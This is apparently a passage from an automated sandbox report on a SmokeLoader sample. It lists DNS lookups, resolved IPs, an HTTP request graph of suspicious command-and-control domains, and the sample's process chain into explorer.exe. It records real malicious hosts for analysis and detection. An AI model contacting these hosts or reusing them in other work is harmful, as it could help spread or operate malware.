                                                                                                                                                Oct 29, 2021 14:10:07.089852095 CEST192.168.2.38.8.8.80x7901Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:07.929352045 CEST192.168.2.38.8.8.80x26e2Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:08.174237013 CEST192.168.2.38.8.8.80xf2b4Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:09.930037975 CEST192.168.2.38.8.8.80x4ec3Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:11.287599087 CEST192.168.2.38.8.8.80x1089Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:11.535811901 CEST192.168.2.38.8.8.80xf6e9Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:11.784204960 CEST192.168.2.38.8.8.80x524aStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:12.428087950 CEST192.168.2.38.8.8.80xe2abStandard query (0)iyc.jelikob.ruA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:12.735543966 CEST192.168.2.38.8.8.80x614cStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:12.990253925 CEST192.168.2.38.8.8.80xe0e1Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:13.261889935 CEST192.168.2.38.8.8.80xfe4bStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:13.544400930 CEST192.168.2.38.8.8.80xc420Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:15.586174965 CEST192.168.2.38.8.8.80xd0bfStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:15.862766027 CEST192.168.2.38.8.8.80x7c2aStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:16.132903099 CEST192.168.2.38.8.8.80x2b2cStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:16.393680096 CEST192.168.2.38.8.8.80xb9bfStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:16.650090933 CEST192.168.2.38.8.8.80x6ef3Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:18.816096067 CEST192.168.2.38.8.8.80xc1c0Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:19.878665924 CEST192.168.2.38.8.8.80x7415Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:20.138806105 CEST192.168.2.38.8.8.80xfda9Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:20.468445063 CEST192.168.2.38.8.8.80x77eStandard query (0)sysaheu90.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:27.111479998 CEST192.168.2.38.8.8.80xa277Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:27.389888048 CEST192.168.2.38.8.8.80x97afStandard query (0)accounts.google.comA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:27.389945984 CEST192.168.2.38.8.8.80x48f4Standard query (0)clients2.google.comA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:29.239370108 CEST192.168.2.38.8.8.80xa8d1Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:29.573542118 CEST192.168.2.38.8.8.80xa6e9Standard query (0)github.comA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:30.214529037 CEST192.168.2.38.8.8.80x3598Standard query (0)avatars.githubusercontent.comA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:31.983638048 CEST192.168.2.38.8.8.80xa3c2Standard query (0)github.comA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:32.245552063 CEST192.168.2.38.8.8.80xab43Standard query (0)avatars.githubusercontent.comA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:34.801071882 CEST192.168.2.38.8.8.80x63aStandard query (0)telegalive.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:37.919708014 CEST192.168.2.38.8.8.80x9d28Standard query (0)telegalive.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:41.363266945 CEST192.168.2.38.8.8.80x26e8Standard query (0)telegalive.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:44.169285059 CEST192.168.2.38.8.8.80x59bStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:44.604974985 CEST192.168.2.38.8.8.80x7156Standard query (0)telegalive.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:48.412956953 CEST192.168.2.38.8.8.80x45ddStandard query (0)telegalive.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:51.762058020 CEST192.168.2.38.8.8.80xe31bStandard query (0)telegalive.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:51.895178080 CEST192.168.2.38.8.8.80x51b2Standard query (0)toptelete.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:57.205171108 CEST192.168.2.38.8.8.80x4151Standard query (0)nusurtal4f.netA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:57.765567064 CEST192.168.2.38.8.8.80xed61Standard query (0)znpst.topA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:09.428842068 CEST192.168.2.38.8.8.80x4603Standard query (0)api.2ip.uaA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:11.175357103 CEST192.168.2.38.8.8.80x5091Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:12.704349995 CEST192.168.2.38.8.8.80xed15Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:17.404216051 CEST192.168.2.38.8.8.80x9631Standard query (0)mas.toA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:20.502801895 CEST192.168.2.38.8.8.80x14c7Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:22.049130917 CEST192.168.2.38.8.8.80x1f6Standard query (0)mas.toA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:41.048815012 CEST192.168.2.38.8.8.80x5be6Standard query (0)api.2ip.uaA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:45.143712044 CEST192.168.2.38.8.8.80xa4e4Standard query (0)api.2ip.uaA (IP address)IN (0x0001)

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                Oct 29, 2021 14:09:40.349797010 CEST8.8.8.8192.168.2.30xc836Name error (3)xacokuo8.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:09:40.389902115 CEST8.8.8.8192.168.2.30xff0cNo error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:09:40.648988008 CEST8.8.8.8192.168.2.30x5478No error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:09:41.235708952 CEST8.8.8.8192.168.2.30xbc14No error (0)privacytoolzforyou-6000.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:09:43.688175917 CEST8.8.8.8192.168.2.30x9db3No error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:09:44.030148983 CEST8.8.8.8192.168.2.30x8a09No error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:00.318998098 CEST8.8.8.8192.168.2.30x9567No error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:00.569439888 CEST8.8.8.8192.168.2.30x947aNo error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:00.851335049 CEST8.8.8.8192.168.2.30x562No error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:01.189889908 CEST8.8.8.8192.168.2.30x1495No error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:01.445811987 CEST8.8.8.8192.168.2.30x91d9No error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:03.579739094 CEST8.8.8.8192.168.2.30xb9c4No error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:03.829663992 CEST8.8.8.8192.168.2.30x1c0bNo error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:04.354789019 CEST8.8.8.8192.168.2.30xffebNo error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:04.758182049 CEST8.8.8.8192.168.2.30xaa7bNo error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:07.112236023 CEST8.8.8.8192.168.2.30x7901No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:07.112236023 CEST8.8.8.8192.168.2.30x7901No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:07.112236023 CEST8.8.8.8192.168.2.30x7901No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:07.112236023 CEST8.8.8.8192.168.2.30x7901No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:07.112236023 CEST8.8.8.8192.168.2.30x7901No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:07.948779106 CEST8.8.8.8192.168.2.30x26e2No error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:08.648478031 CEST8.8.8.8192.168.2.30xf2b4No error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:09.950828075 CEST8.8.8.8192.168.2.30x4ec3No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:09.950828075 CEST8.8.8.8192.168.2.30x4ec3No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:09.950828075 CEST8.8.8.8192.168.2.30x4ec3No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:09.950828075 CEST8.8.8.8192.168.2.30x4ec3No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:09.950828075 CEST8.8.8.8192.168.2.30x4ec3No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:11.306994915 CEST8.8.8.8192.168.2.30x1089No error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:11.555179119 CEST8.8.8.8192.168.2.30xf6e9No error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:12.161859035 CEST8.8.8.8192.168.2.30x524aNo error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:12.493707895 CEST8.8.8.8192.168.2.30xe2abNo error (0)iyc.jelikob.ru81.177.141.36A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:12.754959106 CEST8.8.8.8192.168.2.30x614cNo error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:13.009208918 CEST8.8.8.8192.168.2.30xe0e1No error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:13.281296968 CEST8.8.8.8192.168.2.30xfe4bNo error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:13.564043045 CEST8.8.8.8192.168.2.30xc420No error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:15.605772018 CEST8.8.8.8192.168.2.30xd0bfNo error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:15.882200956 CEST8.8.8.8192.168.2.30x7c2aNo error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:16.153029919 CEST8.8.8.8192.168.2.30x2b2cNo error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:16.413116932 CEST8.8.8.8192.168.2.30xb9bfNo error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:16.670523882 CEST8.8.8.8192.168.2.30x6ef3No error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:18.838687897 CEST8.8.8.8192.168.2.30xc1c0No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:18.838687897 CEST8.8.8.8192.168.2.30xc1c0No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:18.838687897 CEST8.8.8.8192.168.2.30xc1c0No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:18.838687897 CEST8.8.8.8192.168.2.30xc1c0No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:18.838687897 CEST8.8.8.8192.168.2.30xc1c0No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:19.898004055 CEST8.8.8.8192.168.2.30x7415No error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:20.157886028 CEST8.8.8.8192.168.2.30xfda9No error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:20.488089085 CEST8.8.8.8192.168.2.30x77eNo error (0)sysaheu90.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:27.131249905 CEST8.8.8.8192.168.2.30xa277No error (0)hajezey1.top5.188.88.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:27.417649031 CEST8.8.8.8192.168.2.30x97afNo error (0)accounts.google.com172.217.168.45A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:27.429796934 CEST8.8.8.8192.168.2.30x48f4No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:27.429796934 CEST8.8.8.8192.168.2.30x48f4No error (0)clients.l.google.com142.250.203.110A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:29.266856909 CEST8.8.8.8192.168.2.30xa8d1No error (0)js.monitor.azure.comaijscdn2.azureedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:29.274403095 CEST8.8.8.8192.168.2.30x7d5fNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:29.594722033 CEST8.8.8.8192.168.2.30xa6e9No error (0)github.com140.82.121.4A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:30.233423948 CEST8.8.8.8192.168.2.30x3598No error (0)avatars.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:30.233423948 CEST8.8.8.8192.168.2.30x3598No error (0)avatars.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:30.233423948 CEST8.8.8.8192.168.2.30x3598No error (0)avatars.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:30.233423948 CEST8.8.8.8192.168.2.30x3598No error (0)avatars.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:32.007085085 CEST8.8.8.8192.168.2.30xa3c2No error (0)github.com140.82.121.4A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:32.264583111 CEST8.8.8.8192.168.2.30xab43No error (0)avatars.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:32.264583111 CEST8.8.8.8192.168.2.30xab43No error (0)avatars.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:32.264583111 CEST8.8.8.8192.168.2.30xab43No error (0)avatars.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:32.264583111 CEST8.8.8.8192.168.2.30xab43No error (0)avatars.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:34.820704937 CEST8.8.8.8192.168.2.30x63aName error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:38.020772934 CEST8.8.8.8192.168.2.30x9d28Name error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:41.382754087 CEST8.8.8.8192.168.2.30x26e8Name error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:44.196780920 CEST8.8.8.8192.168.2.30x59bNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:44.196780920 CEST8.8.8.8192.168.2.30x59bNo error (0)googlehosted.l.googleusercontent.com142.250.203.97A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:44.624536991 CEST8.8.8.8192.168.2.30x7156Name error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:48.432509899 CEST8.8.8.8192.168.2.30x45ddName error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:51.781487942 CEST8.8.8.8192.168.2.30xe31bName error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:51.918087006 CEST8.8.8.8192.168.2.30x51b2No error (0)toptelete.top172.67.160.46A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:51.918087006 CEST8.8.8.8192.168.2.30x51b2No error (0)toptelete.top104.21.9.146A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:57.240221977 CEST8.8.8.8192.168.2.30x4151No error (0)nusurtal4f.net45.141.84.21A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:58.028448105 CEST8.8.8.8192.168.2.30xed61No error (0)znpst.top211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:58.028448105 CEST8.8.8.8192.168.2.30xed61No error (0)znpst.top222.236.49.123A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:58.028448105 CEST8.8.8.8192.168.2.30xed61No error (0)znpst.top118.221.132.200A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:58.028448105 CEST8.8.8.8192.168.2.30xed61No error (0)znpst.top115.88.24.203A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:58.028448105 CEST8.8.8.8192.168.2.30xed61No error (0)znpst.top89.201.145.218A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:58.028448105 CEST8.8.8.8192.168.2.30xed61No error (0)znpst.top92.62.104.245A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:58.028448105 CEST8.8.8.8192.168.2.30xed61No error (0)znpst.top211.169.6.249A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:58.028448105 CEST8.8.8.8192.168.2.30xed61No error (0)znpst.top179.178.42.164A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:58.028448105 CEST8.8.8.8192.168.2.30xed61No error (0)znpst.top31.166.170.180A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:10:58.028448105 CEST8.8.8.8192.168.2.30xed61No error (0)znpst.top123.213.233.194A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:09.448448896 CEST8.8.8.8192.168.2.30x4603No error (0)api.2ip.ua77.123.139.190A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:11.197093010 CEST8.8.8.8192.168.2.30x5091No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:11.197093010 CEST8.8.8.8192.168.2.30x5091No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:11.197093010 CEST8.8.8.8192.168.2.30x5091No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:11.197093010 CEST8.8.8.8192.168.2.30x5091No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:11.197093010 CEST8.8.8.8192.168.2.30x5091No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:12.723599911 CEST8.8.8.8192.168.2.30xed15No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:12.723599911 CEST8.8.8.8192.168.2.30xed15No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:12.723599911 CEST8.8.8.8192.168.2.30xed15No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:12.723599911 CEST8.8.8.8192.168.2.30xed15No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:12.723599911 CEST8.8.8.8192.168.2.30xed15No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:17.423815966 CEST8.8.8.8192.168.2.30x9631No error (0)mas.to88.99.75.82A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:20.522248030 CEST8.8.8.8192.168.2.30x14c7No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:20.522248030 CEST8.8.8.8192.168.2.30x14c7No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:20.522248030 CEST8.8.8.8192.168.2.30x14c7No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:20.522248030 CEST8.8.8.8192.168.2.30x14c7No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:20.522248030 CEST8.8.8.8192.168.2.30x14c7No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:22.069711924 CEST8.8.8.8192.168.2.30x1f6No error (0)mas.to88.99.75.82A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:41.068432093 CEST8.8.8.8192.168.2.30x5be6No error (0)api.2ip.ua77.123.139.190A (IP address)IN (0x0001)
                                                                                                                                                Oct 29, 2021 14:11:45.163240910 CEST8.8.8.8192.168.2.30xa4e4No error (0)api.2ip.ua77.123.139.190A (IP address)IN (0x0001)

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • hdytesri.org
                                                                                                                                                  • hajezey1.top
                                                                                                                                                • hxpkekj.com
                                                                                                                                                • privacytoolzforyou-6000.top
                                                                                                                                                • glmgx.com
                                                                                                                                                • yuwnqq.com
                                                                                                                                                • bhitjmrc.com
                                                                                                                                                • dignolmjwo.com
                                                                                                                                                • uhgju.org
                                                                                                                                                • vumfxrbs.com
                                                                                                                                                • npvevaeyy.net
                                                                                                                                                • jqgngasfhc.org
                                                                                                                                                • fjibch.net
                                                                                                                                                • yvypqbsdmc.com
                                                                                                                                                • knelfvrqfb.com
                                                                                                                                                • mgtlhphal.com
                                                                                                                                                • iouiiivyis.org
                                                                                                                                                • pblfggd.net
                                                                                                                                                • qrhhbxdcks.net
                                                                                                                                                • tdgnneuj.com
                                                                                                                                                • fvlfqoywa.com
                                                                                                                                                • ymejogxekm.net
                                                                                                                                                • cfgober.net
                                                                                                                                                • weiifp.org
                                                                                                                                                • cwqkqbcdy.org
                                                                                                                                                • rxaxe.net
                                                                                                                                                • auuomlb.com
                                                                                                                                                • hhqcogw.org
                                                                                                                                                • uuocrqwp.org
                                                                                                                                                • eqvwckh.com
                                                                                                                                                • fvfjwsqv.org
                                                                                                                                                • sysaheu90.top
                                                                                                                                                • rowqyedjmp.org
                                                                                                                                                • toptelete.top
                                                                                                                                                • 194.180.174.181
                                                                                                                                                • nusurtal4f.net
                                                                                                                                                • znpst.top
                                                                                                                                                • tnjhdjy.org
                                                                                                                                                  • 193.56.146.214
                                                                                                                                                • rfjetdallh.org
                                                                                                                                                • hndhvvubql.org
                                                                                                                                                • potfqvj.org
                                                                                                                                                • qpxove.net
                                                                                                                                                • oftpi.net
                                                                                                                                                • ussig.org
                                                                                                                                                • ddmqcj.org
                                                                                                                                                • swmkrkh.net
                                                                                                                                                • 65.108.80.190

                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                Analysis Process: Md0q201V1D.exe PID: 6304 Parent PID: 5100

                                                                                                                                                General

                                                                                                                                                Start time:14:08:56
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\Desktop\Md0q201V1D.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Users\user\Desktop\Md0q201V1D.exe'
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:346624 bytes
                                                                                                                                                MD5 hash:A0BC297D8EAAD37F1B145D108786E993
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low

                                                                                                                                                Analysis Process: Md0q201V1D.exe PID: 5724 Parent PID: 6304

                                                                                                                                                General

                                                                                                                                                Start time:14:09:01
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\Desktop\Md0q201V1D.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Users\user\Desktop\Md0q201V1D.exe'
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:346624 bytes
                                                                                                                                                MD5 hash:A0BC297D8EAAD37F1B145D108786E993
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.338103224.00000000004F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.338316447.0000000001F91000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low

                                                                                                                                                Analysis Process: explorer.exe PID: 3352 Parent PID: 5724

                                                                                                                                                General

                                                                                                                                                Start time:14:09:08
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                Imagebase:0x7ff720ea0000
                                                                                                                                                File size:3933184 bytes
                                                                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
